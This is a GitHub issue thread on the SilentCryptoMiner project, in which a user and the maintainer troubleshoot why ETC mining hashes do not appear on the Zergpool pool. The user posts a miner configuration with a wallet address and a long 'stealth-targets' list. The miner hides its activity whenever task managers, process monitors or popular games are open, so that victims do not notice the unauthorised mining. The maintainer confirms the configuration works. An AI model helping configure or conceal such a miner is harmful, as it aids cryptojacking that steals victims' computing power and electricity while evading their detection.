### ISSUE TITLE
ETC on Zergpool

### ISSUE THREAD

**Issue by R3dacted00** [UnamSanctam/SilentCryptoMiner#1391]
I redirected the etc miners on zergpool under my BTC address to add the etc hashes to the gr hashes. the pool detects it but no hashes are shown (it's been like half an hour and I'm mining on a 3060), I was wondering if I set up the pool well at this point, any idea?

### {
    "url": "stratums://`bc1q2g4q7aa2c0gdmmwxw55jwhq83km2kwdt4d8sz3`:c=BTC,ID={COMPUTERNAME}@etchash.mine.zergpool.com:19997",
    "algo": "etchash",
    "max-gpu": 40,
    "idle-wait": 3,
    "idle-gpu": 40,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}

**Comment by R3dacted00** [comment]
I tried to put stratum+ssl instead of stratums to see if it changes something but I doubt that's the problem :/

**Comment by UnamSanctam** [comment]
And if you check MSI Afterburner then it's using GPU?

**Comment by R3dacted00** [comment]
I reverted the settings to the ones on my first comment but now the pool is not detecting the miner anymore, I left it running for 2 hours until now. The checker and msi afterburner say it's mining but for some reasons it's not even connecting to the pool anymore...

**Comment by R3dacted00** [comment]
So even if I choose BTC as payment method, you're saying It doesn't convert the etc to BTC? I thougt that's how It worked, if that's the case Is there a way I can let the etc miner coin switch like the xmr miner? Maybe by changing algorythm or something like that

**Comment by UnamSanctam** [comment]
Yes it would exchange the BTC to ETC, but that's not what I meant by coin switching (though the wording can also be interpreted as that), what I meant by coin switching is also what's called profit switching, which is when a pool changes between mining the most profitable coins for some specific algorithm to maximize the profit. But since only the ETC coin uses the etchash algorithm Zergpool cannot profit switch and instead just mines ETC.

And I just tried mining with your configuration and zergpool did accept the shares, so anything that happens should be on their side.

**Comment by R3dacted00** [comment]
Thanks, I'll try one more time and if it doesn't work again I'll move back to 2miners
